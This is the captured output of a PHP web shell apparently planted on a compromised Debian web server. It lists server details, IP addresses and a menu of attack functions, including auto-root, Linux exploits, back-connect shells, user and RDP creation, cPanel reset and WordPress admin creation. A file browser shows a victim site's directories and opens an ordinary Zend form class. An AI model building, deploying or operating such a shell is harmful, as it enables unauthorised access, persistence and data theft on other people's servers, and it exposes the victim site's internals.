Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.29.192
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
leksykografia /
application /
forms /
[ HOME SHELL ]
Name
Size
Permission
Action
Page.php
3.2
KB
-rw-r--r--
Partner.php
2.1
KB
-rw-r--r--
Vote.php
2.04
KB
-rw-r--r--
VoteAdmin.php
1.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Partner.php
<?php class Application_Form_Partner extends Zend_Form { public function init() { $partnerTypeMapper = new Application_Model_PartnerTypeMapper(); $partnerTypes = $partnerTypeMapper->fetchAll(); // Set the method for the display form to POST $this->setMethod('post'); $this->setEnctype(Zend_Form::ENCTYPE_MULTIPART); // Add an email element $this->addElement('checkbox', 'active', array( 'label' => 'Aktywny:', 'required' => true, )); $partnerTypeSelect = new Zend_Form_Element_Select('partnerType', array( 'label' => 'Typ partnera:', 'required' => true, 'validators' => array( array( 'NotEmpty', true, array( 'messages' => array( 'isEmpty' => 'Pole nie może by puste.' ))), ) )); foreach($partnerTypes as $partnerType) $partnerTypeSelect->addMultiOption($partnerType->getId(), $partnerType->getName()); $this->addElement($partnerTypeSelect); $image = new Zend_Form_Element_File('image'); $image->setLabel('Obrazek:') ->setDestination(realpath(APPLICATION_PATH . '/../public/uploads')) ->setRequired(false) ->setMaxFileSize(2097152); // limits the filesize on the client side $image->addValidator('Count', false, 1); // ensure only 1 file $image->addValidator('Size', false, 2097152); // limit to 10 meg $image->addValidator('Extension', false, 'jpg,jpeg,png,gif');// only JPEG, PNG, and GIFs $this->addElement($image); $this->addElement('text', 'link', array( 'label' => 'Link:', 'required' => false, )); // Add the submit button $this->addElement('submit', 'submit', array( 'ignore' => true, 'label' => 'Zatwierdź', )); } }
Close